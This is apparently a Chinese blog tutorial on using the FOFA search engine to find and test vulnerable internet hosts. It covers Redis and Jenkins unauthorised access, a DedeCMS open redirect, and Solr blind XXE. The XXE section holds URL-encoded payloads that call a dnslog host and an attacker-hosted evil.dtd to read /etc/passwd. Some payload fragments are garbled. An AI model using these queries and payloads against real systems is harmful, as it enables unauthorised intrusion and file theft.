FOFA是一款非常強大的搜索引擎

關于對于fofa的描述是:FOFA(網絡空間資產檢索系統)是世界上數據覆蓋更完整的IT設備搜索引擎,擁有全球聯網IT設備更全的DNA信息。

探索全球互聯網的資產信息,進行資產及漏洞影響范圍分析、應用分布統計、應用流行度態勢感知等。

相對于shodan來說fofa的優點就是更加本土化,擁有更多的域名數據,建立了全球最大的資產規則集,而且現在已經更新了識別蜜罐的功能。

fofa的功能這么強大,那我們要怎么利用好提供的功能來挖洞呢?

fofa官方提供了一些基本語法:

而真正高效的用法就是靈活使用邏輯運算符,fofa可以使用高級搜索:括號 和 && || !=等符號進行指紋的組合。

比如我們想搜索開放3389端口并且位于中國的IP,對應的語法就是port="3389" && country=CN

下面就展示一些利用fofa來刷洞的過程。

不過在這之前一定要注意,遵守法律法規,不要作出破壞性的行為,不要做未授權的測試。

不然...嘿嘿嘿、有個地方包吃包住還送白金手鐲。

下面的例子,就是利用fofa來刷洞的例子,少年發揮你的想象力吧。

1、Redis未授權fofa語法搜索:

port="6379"

直接nc 連 6379端口

輸入命令info返回了redis基本信息

2、Jenkins 未授權

fofa語法搜索:

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

在默認情況下Jenkins面板中用戶可以選擇執行腳本界面來操作一些系統層命令。

所以jenkins未授權的危害非常大。

執行一下命令:

3、Apache solr XML 實體注入漏洞

Apache Solr 是一個開源的搜索服務器。

Solr 使用 Java 語言開發,主要基于 HTTP 和 Apache Lucene 實現。

原理大致是文檔通過Http利用XML加到一個搜索集合中。

查詢該集合也是通過 http收到一個XML/JSON響應來實現

fofa語法搜索:

app="Solr" && port="8983"

找到了目標ip進入主界面

可以看到版本小于7.0,所以可能存在xxe

進入搜索框,切換成搜索xxe

BP抓包

構造payload嘗試外帶,外帶地址是dnslog:qmurld.dnslog.cnpayload:

%remote;]>
&wt=xml&defType=xmlparser

將payload進行url編碼

%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C%21DOCTYPE%20root%20%5B%0A%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//qmurld.dnslog.cn/%22%3E%0A%25remote%3B%5D%3E%0A%3Croot/%3E&wt=xml&defType=xmlparser

發現外帶成功,所以存在xxe漏洞

因為是Blind xxe,所以在需要在vps服務器上構造惡意的dtd

放在服務器上的evil.dtd

">

BP請求的內容

%ext;%ent;]>&data;

請求的內容也需要進行url編碼

%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f ip:port %2fevil.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E

發現已經成功讀取到/etc/passwd

4、dedecms url跳轉漏洞

先在fofa語法搜索

body="/plus/download.php"

在后面加入鏈接/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D跳轉到百度,

百度url要base64編碼

成功跳轉

更多的姿勢還需要多多發揮想象力,去組合,去找到對應漏洞的特征。